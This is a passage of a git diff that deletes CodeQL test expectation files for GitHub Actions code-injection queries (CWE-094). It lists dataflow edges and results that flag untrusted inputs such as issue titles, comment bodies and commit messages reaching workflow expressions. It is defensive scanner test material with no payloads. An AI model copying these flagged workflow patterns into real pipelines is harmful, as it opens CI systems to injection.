| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected deleted file mode 100644 index 697cf2a310e8..000000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected +++ /dev/null 
@@ -1,14 +0,0 @@ -edges -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -nodes -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | -subpaths -#select -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential critical code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref deleted file mode 100644 index 05ef02c50948..000000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CriticalCodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref deleted file mode 100644 index 1745587e534a..000000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected deleted file mode 100644 index f852a1b59815..000000000000 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ /dev/null 
@@ -1,276 +0,0 @@ -edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | -| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 
| Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | -| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | -| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | 
steps.source.outputs.all_changed_files | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | 
.github/workflows/issues.yaml:15:19:15:39 | env.global_env | -| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | -| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | -| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | -| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | -| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | -| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | 
needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | -nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | -| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| 
.github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | -| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | -| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | 
github.event.discussion.title | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:15:20:15:50 | 
steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | 
semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | -| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_review.yml:9:19:9:61 | 
github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | 
semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | -| 